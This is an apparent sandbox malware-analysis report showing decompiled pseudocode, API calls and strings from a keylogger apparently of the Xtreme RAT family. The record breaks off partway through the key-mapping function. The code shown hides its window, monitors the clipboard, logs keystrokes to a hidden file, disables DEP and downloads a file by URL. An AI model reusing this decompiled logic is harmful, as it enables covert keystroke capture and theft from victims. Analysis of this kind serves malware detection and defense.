0x00c87a1e
0x00c87a2d
0x00c87a3c
0x00c87a4b
0x00c87a4b
0x00c87a52
0x00c87a55
0x00c87a58
0x00000000

APIs

RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 00C879FB
RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 00C87A0A
RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 00C87A19
RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 00C87A28
RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 00C87A37
RegisterClipboardFormatW.USER32(frgkmjgtmklgtlrglt), ref: 00C87A46

Strings

hgtrfsgfrsgfgregtregtr, xrefs: 00C87A23
jytjyegrsfvfbgfsdf, xrefs: 00C87A14
frgkmjgtmklgtlrglt, xrefs: 00C87A41
frgjbfdkbnfsdjbvofsjfrfre, xrefs: 00C87A32
jiejwogfdjieovevodnvfnievn, xrefs: 00C879F6
trhgtehgfsgrfgtrwegtre, xrefs: 00C87A05

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C879DC, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34
registryclipboard

C-Code - Quality: 60%

			E00C879DC() {
				intOrPtr _t11;
				intOrPtr _t14;

				_push(_t14);
				_push(0xc87a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t14;
				 *0xc8dee4 =  *0xc8dee4 - 1;
				if( *0xc8dee4 < 0) {
					 *0xc8decc = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
					 *0xc8ded0 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
					 *0xc8ded4 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
					 *0xc8ded8 = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
					 *0xc8dedc = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
					 *0xc8dee0 = RegisterClipboardFormatW(L"frgkmjgtmklgtlrglt");
				}
				_pop(_t11);
				 *[fs:eax] = _t11;
				_push(E00C87A65);
				return 0;
			}

0x00c879e1
0x00c879e2
0x00c879e7
0x00c879ea
0x00c879ed
0x00c879f4
0x00c87a00
0x00c87a0f
0x00c87a1e
0x00c87a2d
0x00c87a3c
0x00c87a4b
0x00c87a4b
0x00c87a52
0x00c87a55
0x00c87a58
0x00000000

APIs

RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 00C879FB
RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 00C87A0A
RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 00C87A19
RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 00C87A28
RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 00C87A37
RegisterClipboardFormatW.USER32(frgkmjgtmklgtlrglt), ref: 00C87A46

Strings

hgtrfsgfrsgfgregtregtr, xrefs: 00C87A23
jytjyegrsfvfbgfsdf, xrefs: 00C87A14
frgkmjgtmklgtlrglt, xrefs: 00C87A41
frgjbfdkbnfsdjbvofsjfrfre, xrefs: 00C87A32
jiejwogfdjieovevodnvfnievn, xrefs: 00C879F6
trhgtehgfsgrfgtrwegtre, xrefs: 00C87A05

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C898DC, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 79
librarywindow

C-Code - Quality: 100%

			E00C898DC(intOrPtr _a4) {
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				signed int _t20;
				signed int _t21;

				_t17 = _a4;
				LoadLibraryA("user32.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("shell32.dll");
				LoadLibraryA("shlwapi.dll");
				E00C888D0(0x80000001, L"SOFTWARE\\FakeMessage", 2, 4, 0, L"OK");
				_t12 =  *((intOrPtr*)(_t17 + 0x1554));
				if(_t12 != 0) {
					if(_t12 != 1) {
						if(_t12 != 2) {
							if(_t12 != 3) {
								if(_t12 != 4) {
									if(_t12 == 5) {
										_t21 = 2;
									}
								} else {
									_t21 = 3;
								}
							} else {
								_t21 = 4;
							}
						} else {
							_t21 = 5;
						}
					} else {
						_t21 = 1;
					}
				} else {
					_t21 = 0;
				}
				_t13 =  *((intOrPtr*)(_t17 + 0x1550));
				if(_t13 != 0) {
					if(_t13 != 1) {
						if(_t13 != 2) {
							if(_t13 != 3) {
								if(_t13 == 4) {
									_t20 = 0;
								}
							} else {
								_t20 = 0x40;
							}
						} else {
							_t20 = 0x30;
						}
					} else {
						_t20 = 0x10;
					}
				} else {
					_t20 = 0x20;
				}
				return MessageBoxW(0, _t17 + 0x156e, _t17 + 0x1558, _t21 | _t20);
			}

0x00c898e2
0x00c898ea
0x00c898f4
0x00c898fe
0x00c89908
0x00c89927
0x00c8992c
0x00c89934
0x00c8993d
0x00c89949
0x00c89955
0x00c89961
0x00c8996d
0x00c8996f
0x00c8996f
0x00c89963
0x00c89963
0x00c89963
0x00c89957
0x00c89957
0x00c89957
0x00c8994b
0x00c8994b
0x00c8994b
0x00c8993f
0x00c8993f
0x00c8993f
0x00c89936
0x00c89936
0x00c89936
0x00c89974
0x00c8997c
0x00c89988
0x00c89994
0x00c899a0
0x00c899ac
0x00c899ae
0x00c899ae
0x00c899a2
0x00c899a2
0x00c899a2
0x00c89996
0x00c89996
0x00c89996
0x00c8998a
0x00c8998a
0x00c8998a
0x00c8997e
0x00c8997e
0x00c8997e
0x00c899cc

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C898EA
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C898F4
LoadLibraryA.KERNEL32(shell32.dll), ref: 00C898FE
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C89908

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,?,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,?,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

MessageBoxW.USER32(00000000,?,?,?), ref: 00C899C3

Strings

advapi32.dll, xrefs: 00C898EF
user32.dll, xrefs: 00C898E5
shell32.dll, xrefs: 00C898F9
SOFTWARE\FakeMessage, xrefs: 00C8991D
shlwapi.dll, xrefs: 00C89903
FakeMessage, xrefs: 00C89918

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C87B84, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 119
file

C-Code - Quality: 87%

			E00C87B84(void* __eax, void* __ebx, void* __esi) {
				long _v8;
				char _v12;
				WCHAR* _t12;
				WCHAR* _t14;
				WCHAR* _t19;
				WCHAR* _t21;
				long _t25;
				long _t29;
				void* _t30;
				struct _OVERLAPPED* _t32;
				void* _t37;
				WCHAR* _t41;
				WCHAR* _t46;
				intOrPtr _t48;
				intOrPtr _t57;
				struct _OVERLAPPED* _t59;
				void* _t61;
				WCHAR* _t63;
				WCHAR* _t64;
				void* _t66;
				void* _t67;
				void* _t70;

				_v12 = 0;
				_t66 = __eax;
				_push(_t70);
				_push(0xc87d2a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xfffffff8;
				 *0xc8e020 = 0;
				 *0xc8e024 = 0;
				 *0xc8e028 = 0;
				if( *0xc8e014 == 1) {
					_t46 =  *0xc8e01c; // 0x0
					if(E00C835B0(_t46) == 0) {
						_t64 =  *0xc8e01c; // 0x0
						_t48 =  *0xc8e018; // 0x0
						E00C837C0(_t48, _t64);
					}
				}
				_t12 =  *0xc8e01c; // 0x0
				if(E00C835B0(_t12) == 0) {
					_t63 =  *0xc8e01c; // 0x0
					E00C837C0(_t66, _t63);
				}
				_t14 =  *0xc8e01c; // 0x0
				if(E00C835B0(_t14) == 1) {
					_t19 =  *0xc8e01c; // 0x0
					SetFileAttributesW(_t19, 0x80);
					_t21 =  *0xc8e01c; // 0x0
					_t67 = CreateFileW(_t21, 0x80000000, 1, 0, 3, 0, 0);
					if(_t67 != 0xffffffff) {
						 *0xc8e024 = GetFileSize(_t67, 0);
						 *0xc8e028 = 0;
						_t25 =  *0xc8e024; // 0x0
						 *0xc8e020 = VirtualAlloc(0, _t25, 0x1000, 0x40);
						SetFilePointer(_t67, 0, 0, 0);
						_t29 =  *0xc8e024; // 0x0
						_t30 =  *0xc8e020; // 0x0
						ReadFile(_t67, _t30, _t29,  &_v8, 0);
						_t32 =  *0xc8e024; // 0x0
						_t59 =  *0xc8e028; // 0x0
						E00C81F6C( &_v12, E00C8214C(_t32, _t59, 2, 0));
						_t37 = E00C81CF4(_v12);
						_t61 =  *0xc8e020; // 0x0
						E00C82914(_t37, _t61);
						if((0 | E00C81F1C(L"ENDSERVERBUFFER", _v12) > 0x00000000) == 0) {
							_t41 =  *0xc8e01c; // 0x0
							DeleteFileW(_t41);
							 *0xc8e020 = 0;
							 *0xc8e024 = 0;
							 *0xc8e028 = 0;
						}
					}
					CloseHandle(_t67);
				}
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E00C87D31);
				return E00C81B78( &_v12);
			}

0x00c87b8e
0x00c87b91
0x00c87b95
0x00c87b96
0x00c87b9b
0x00c87b9e
0x00c87ba3
0x00c87ba8
0x00c87bb2
0x00c87bc5
0x00c87bc7
0x00c87bd3
0x00c87bd5
0x00c87bdb
0x00c87be0
0x00c87be0
0x00c87bd3
0x00c87be5
0x00c87bf1
0x00c87bf3
0x00c87bfb
0x00c87bfb
0x00c87c00
0x00c87c0c
0x00c87c17
0x00c87c1d
0x00c87c31
0x00c87c3c
0x00c87c41
0x00c87c51
0x00c87c57
0x00c87c64
0x00c87c71
0x00c87c7d
0x00c87c88
0x00c87c8e
0x00c87c95
0x00c87c9e
0x00c87ca4
0x00c87cb4
0x00c87cbc
0x00c87cc7
0x00c87ccd
0x00c87ce6
0x00c87ce8
0x00c87cee
0x00c87cf5
0x00c87cfa
0x00c87d04
0x00c87d04
0x00c87ce6
0x00c87d0f
0x00c87d0f
0x00c87d16
0x00c87d19
0x00c87d1c
0x00c87d29

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000), ref: 00C87C6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001), ref: 00C87CEE
CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

Part of subcall function 00C837C0: DeleteUrlCacheEntryW.WININET(local), ref: 00C837C7
Part of subcall function 00C837C0: DeleteFileW.KERNEL32(00000000,local,00000000,00C87C00,00000000,00C87D2A,?,00000000,00000000), ref: 00C837CD
Part of subcall function 00C837C0: URLDownloadToFileW.URLMON(00000000,local,00000000,00000000,00000000), ref: 00C837DA

Strings

ENDSERVERBUFFER, xrefs: 00C87CD5

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C87744, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108
windowclipboard

C-Code - Quality: 95%

			E00C87744(void* __esi, void* __ebp) {
				int _v8;
				long _v12;
				char _v16;
				char _v19;
				char _v20;
				void* __ebx;
				struct HWND__* _t11;
				WCHAR* _t13;
				WCHAR* _t15;
				struct HWND__* _t16;
				void* _t17;
				long _t18;
				WCHAR* _t19;
				void* _t21;
				int _t24;
				int _t26;
				struct HWND__* _t27;
				struct HWND__* _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t37;
				int _t42;
				int _t45;
				void* _t48;

				_t48 = __esi;
				E00C8684C();
				 *0xc8dff5 = 1;
				_t41 = L"XtremeKeylogger";
				if( *0xc8b0b4 <= 0) {
					 *0xc8b0b4 = E00C87348(L"XtremeKeylogger", E00C86948);
				}
				_t11 =  *0xc8b0b4; // 0x0
				ShowWindow(_t11, 0);
				_t13 =  *0xc8dec8; // 0x0
				SetFileAttributesW(_t13, 0x80);
				_t15 =  *0xc8dec8; // 0x0
				_t16 = CreateFileW(_t15, 0xc0000000, 3, 0, 4, 0, 0);
				 *0xc8dee8 = _t16;
				if( *0xc8dee8 != 0xffffffff) {
					_t17 =  *0xc8dee8; // 0x0
					_t18 = GetFileSize(_t17, 0);
					_t45 = 0;
					_v12 = _t18;
					_v8 = 0;
					if(_v8 != 0 || _v12 != 0) {
						 *0xc8dff4 = 0;
					} else {
						_v20 = 0xff;
						_v19 = 0xfe;
						_t45 =  &_v20;
						_t37 =  *0xc8dee8; // 0x0
						E00C85084(_t37, 2, _t45, 0,  &_v16);
						 *0xc8dff4 = 1;
					}
					_t19 =  *0xc8dec8; // 0x0
					SetFileAttributesW(_t19, 7);
					_t21 =  *0xc8dee8; // 0x0
					SetFilePointer(_t21, 0, 0, 2);
					_t42 = E00C852E8(_t41);
					_t24 = _t42;
					asm("cdq");
					if(_t45 != _v8) {
						if(__eflags <= 0) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						if(_t24 <= _v12) {
							L12:
							asm("cdq");
							 *0xc8b0c8 = _t42;
							 *0xc8b0cc = _t45;
						} else {
							L11:
							 *0xc8b0c8 = 0;
							 *0xc8b0cc = 0;
							E00C853EC(0, _t41, _t48);
						}
					}
					_t26 =  *0xc8ded4; // 0xc1f3
					_t27 =  *0xc8b0b4; // 0x0
					SendMessageA(_t27, _t26, 0, 0);
					_t29 =  *0xc8b0b4; // 0x0
					_t16 = SetClipboardViewer(_t29);
					if( *0xc8da4b == 1) {
						if( *0xc8dffc != 0) {
							_t32 =  *0xc8dffc; // 0x0
							E00C8387C(_t32);
						}
						_t31 = E00C8384C(E00C87614, 0, 0);
						 *0xc8dffc = _t31;
						return _t31;
					}
				}
				return _t16;
			}

0x00c87744
0x00c87748
0x00c8774d
0x00c87754
0x00c87760
0x00c8776e
0x00c8776e
0x00c87775
0x00c8777b
0x00c87785
0x00c8778b
0x00c8779f
0x00c877a5
0x00c877aa
0x00c877b6
0x00c877be
0x00c877c4
0x00c877c9
0x00c877cb
0x00c877cf
0x00c877d8
0x00c8780d
0x00c877e1
0x00c877e1
0x00c877e5
0x00c877f1
0x00c877fa
0x00c877ff
0x00c87804
0x00c87804
0x00c87816
0x00c8781c
0x00c87827
0x00c8782d
0x00c87837
0x00c87839
0x00c8783b
0x00c87840
0x00c8784a
0x00000000
0x00000000
0x00000000
0x00000000
0x00c87842
0x00c87846
0x00c87869
0x00c8786b
0x00c8786c
0x00c87872
0x00c87848
0x00c8784c
0x00c8784c
0x00c87856
0x00c87862
0x00c87862
0x00c87846
0x00c8787c
0x00c87882
0x00c87888
0x00c8788d
0x00c87893
0x00c8789f
0x00c878a8
0x00c878aa
0x00c878af
0x00c878af
0x00c878bf
0x00c878c4
0x00000000
0x00c878c4
0x00c8789f
0x00c878cd

APIs

Part of subcall function 00C8684C: SendMessageA.USER32(00000000,0000C1F2,00000000,00000000), ref: 00C86865
Part of subcall function 00C8684C: CloseHandle.KERNEL32(00000000), ref: 00C86879

ShowWindow.USER32(00000000,00000000), ref: 00C8777B
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C8778B
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000004,00000000,00000000), ref: 00C877A5
GetFileSize.KERNEL32(00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080), ref: 00C877C4
SetFileAttributesW.KERNEL32(00000000,00000007,00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080), ref: 00C8781C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000007,00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000), ref: 00C8782D

Part of subcall function 00C852E8: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
Part of subcall function 00C852E8: RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
Part of subcall function 00C852E8: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

SendMessageA.USER32(00000000,0000C1F3,00000000,00000000), ref: 00C87888
SetClipboardViewer.USER32(00000000), ref: 00C87893

Part of subcall function 00C8384C: CreateThread.KERNEL32(00000000,00000000,00C87D60,00000000,?,?), ref: 00C83862
Part of subcall function 00C8384C: SetThreadPriority.KERNEL32(00000000,00000000,00000001,?,00000000,?,00C88DB8,00000000), ref: 00C8386B

Part of subcall function 00C8387C: TerminateThread.KERNEL32(00000000,00000001,?,XtremeKeylogger,00C878B4,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000007,00000000), ref: 00C83883
Part of subcall function 00C8387C: CloseHandle.KERNEL32(00000000), ref: 00C8388F

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C85084: WriteFile.KERNEL32(00000000,?,00000002,?,?), ref: 00C850AA

Part of subcall function 00C87348: GetDesktopWindow.USER32 ref: 00C87390
Part of subcall function 00C87348: GetWindowRect.USER32(00000000), ref: 00C87396
Part of subcall function 00C87348: GetModuleHandleA.KERNEL32(00000000), ref: 00C8739D
Part of subcall function 00C87348: RegisterClassW.USER32(?), ref: 00C873A5
Part of subcall function 00C87348: CreateWindowExW.USER32(00000080,XtremeKeylogger,00C873DC,98000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C873CF

Strings

XtremeKeylogger, xrefs: 00C87754

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C82994, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91
library

C-Code - Quality: 64%

			E00C82994(intOrPtr __eax) {
				signed int _v20;
				signed int _t15;
				signed int _t16;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t25;
				void* _t28;
				signed int _t32;
				signed int _t35;
				signed int _t36;
				signed int _t39;
				intOrPtr* _t40;
				struct HINSTANCE__* _t41;
				struct HINSTANCE__* _t42;
				signed int _t43;
				intOrPtr* _t44;
				void* _t45;
				intOrPtr* _t46;
				void* _t49;

				_t46 = _t45 + 0xfffffff8;
				 *_t46 = __eax;
				_t36 = 0;
				_t41 = GetModuleHandleA("Kernel32.dll");
				if(_t41 == 0xffffffff) {
					L10:
					__eflags = _t36 - 1;
					if(_t36 == 1) {
						L23:
						return _t36;
					}
					_t42 = GetModuleHandleA("ntdll.dll");
					__eflags = _t42 - 0xffffffff;
					if(_t42 == 0xffffffff) {
						goto L23;
					}
					_t43 = GetProcAddress(_t42, "NtSetInformationProcess");
					_t39 = _t43;
					__eflags = _t43;
					if(_t43 == 0) {
						goto L23;
					}
					_t15 =  *_t46 - 1;
					__eflags = _t15;
					if(__eflags < 0) {
						_t16 =  *0xc8b0a0; // 0x2
						_v20 = _t16;
						L20:
						_t19 =  *_t39(GetCurrentProcess(), 0x22,  &_v20, 4);
						__eflags = _t19;
						if(_t19 != 0) {
							_t36 = 0;
							__eflags = 0;
						} else {
							_t36 = 1;
						}
						goto L23;
					}
					if(__eflags == 0) {
						_t20 =  *0xc8b0a8; // 0x8
						_v20 = _t20 |  *0xc8b09c;
						goto L20;
					}
					__eflags = _t15 == 1;
					if(_t15 == 1) {
						_t23 =  *0xc8b0a8; // 0x8
						_t25 = _t23 |  *0xc8b09c |  *0xc8b0a4;
						__eflags = _t25;
						_v20 = _t25;
						goto L20;
					}
					goto L23;
				}
				_t44 = GetProcAddress(_t41, "SetProcessDEPPolicy");
				_t40 = _t44;
				if(_t44 == 0) {
					goto L10;
				}
				_t28 =  *_t46 - 1;
				_t49 = _t28;
				if(_t49 < 0) {
					_v20 = 0;
					L9:
					_t36 =  *_t40(_v20);
					goto L10;
				}
				if(_t49 == 0) {
					_t32 =  *0xc8b094; // 0x1
					_v20 = _t32 |  *0xc8b098;
					goto L9;
				}
				if(_t28 == 1) {
					_t35 =  *0xc8b094; // 0x1
					_v20 = _t35;
					goto L9;
				}
				goto L23;
			}

0x00c82998
0x00c8299b
0x00c8299e
0x00c829aa
0x00c829af
0x00c82a01
0x00c82a01
0x00c82a04
0x00c82a85
0x00c82a8d
0x00c82a8d
0x00c82a10
0x00c82a12
0x00c82a15
0x00000000
0x00000000
0x00c82a22
0x00c82a24
0x00c82a26
0x00c82a28
0x00000000
0x00000000
0x00c82a2d
0x00c82a2d
0x00c82a2f
0x00c82a39
0x00c82a3e
0x00c82a6a
0x00c82a79
0x00c82a7b
0x00c82a7d
0x00c82a83
0x00c82a83
0x00c82a7f
0x00c82a7f
0x00c82a7f
0x00000000
0x00c82a7d
0x00c82a31
0x00c82a44
0x00c82a4f
0x00000000
0x00c82a4f
0x00c82a33
0x00c82a35
0x00c82a55
0x00c82a60
0x00c82a60
0x00c82a66
0x00000000
0x00c82a66
0x00000000
0x00c82a37
0x00c829bc
0x00c829be
0x00c829c2
0x00000000
0x00000000
0x00c829c7
0x00c829c7
0x00c829c9
0x00c829d8
0x00c829f8
0x00c829ff
0x00000000
0x00c829ff
0x00c829cb
0x00c829de
0x00c829e9
0x00000000
0x00c829e9
0x00c829cf
0x00c829ef
0x00c829f4
0x00000000
0x00c829f4
0x00000000

APIs

GetModuleHandleA.KERNEL32(Kernel32.dll), ref: 00C829A5
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy,Kernel32.dll), ref: 00C829B7
GetModuleHandleA.KERNEL32(ntdll.dll,Kernel32.dll), ref: 00C82A0B
GetProcAddress.KERNEL32(00000000,NtSetInformationProcess,ntdll.dll,Kernel32.dll), ref: 00C82A1D
GetCurrentProcess.KERNEL32(00000022,?,00000004,00000000,NtSetInformationProcess,ntdll.dll,Kernel32.dll), ref: 00C82A73

Strings

NtSetInformationProcess, xrefs: 00C82A17
ntdll.dll, xrefs: 00C82A06
SetProcessDEPPolicy, xrefs: 00C829B1
Kernel32.dll, xrefs: 00C829A0

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85568, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 172
keyboard

C-Code - Quality: 98%

			E00C85568(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr* _a4, struct HKL__* _a8) {
				signed int _v6;
				signed int _v8;
				char _v9;
				void _v265;
				char _v524;
				int _v528;
				void _v532;
				short _v788;
				char _v1044;
				char _v1048;
				char _v1052;
				void* _t41;
				void* _t48;
				int _t73;
				int _t77;
				int _t102;
				signed int _t113;
				intOrPtr _t115;
				intOrPtr* _t136;
				int _t145;
				int _t147;
				void* _t152;

				_t113 = __edx;
				_v1052 = 0;
				_v1048 = 0;
				_t41 = memcpy( &_v265, __ecx, 0x40 << 2);
				_v8 = _t113;
				_v6 = _t41;
				_t136 = _a4;
				_push(_t152);
				_push(0xc85fbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152 + 0xfffffffffffffbf4;
				E00C81B78(_t136);
				_t102 = 0;
				E00C8291C();
				_t48 = (_v6 & 0x0000ffff) + 0xfffffff8;
				if(_t48 <= 0xf3) {
					switch( *((intOrPtr*)( *(_t48 + E00C855E2) * 4 +  &M00C856D6))) {
						case 0:
							goto L90;
						case 1:
							E00C81BB4(_t136, L"[Numpad +]");
							goto L90;
						case 2:
							__eax = __edi;
							__edx = L"[Backspace]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 3:
							__eax = __edi;
							__edx = L"[Numpad .]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 4:
							__eax = __edi;
							__edx = L"[Numpad /]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 5:
							__eax = __edi;
							__edx = L"[Esc]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 6:
							__eax = __edi;
							__edx = L"[Execute]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 7:
							__eax = __edi;
							__edx = L"[Numpad *]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 8:
							__eax = __edi;
							__edx = 0xc86088;
							__eax = E00C81BB4(__edi, 0xc86088);
							goto L90;
						case 9:
							__eax = __edi;
							__edx = 0xc86090;
							__eax = E00C81BB4(__edi, 0xc86090);
							goto L90;
						case 0xa:
							__eax = __edi;
							__edx = 0xc86098;
							__eax = E00C81BB4(__edi, 0xc86098);
							goto L90;
						case 0xb:
							__eax = __edi;
							__edx = 0xc860a0;
							__eax = E00C81BB4(__edi, 0xc860a0);
							goto L90;
						case 0xc:
							__eax = __edi;
							__edx = 0xc860a8;
							__eax = E00C81BB4(__edi, 0xc860a8);
							goto L90;
						case 0xd:
							__eax = __edi;
							__edx = 0xc860b0;
							__eax = E00C81BB4(__edi, 0xc860b0);
							goto L90;
						case 0xe:
							__eax = __edi;
							__edx = 0xc860b8;
							__eax = E00C81BB4(__edi, 0xc860b8);
							goto L90;
						case 0xf:
							__eax = __edi;
							__edx = 0xc860c0;
							__eax = E00C81BB4(__edi, 0xc860c0);
							goto L90;
						case 0x10:
							__eax = __edi;
							__edx = 0xc860c8;
							__eax = E00C81BB4(__edi, 0xc860c8);
							goto L90;
						case 0x11:
							__eax = __edi;
							__edx = 0xc860d0;
							__eax = E00C81BB4(__edi, 0xc860d0);
							goto L90;
						case 0x12:
							__eax = __edi;
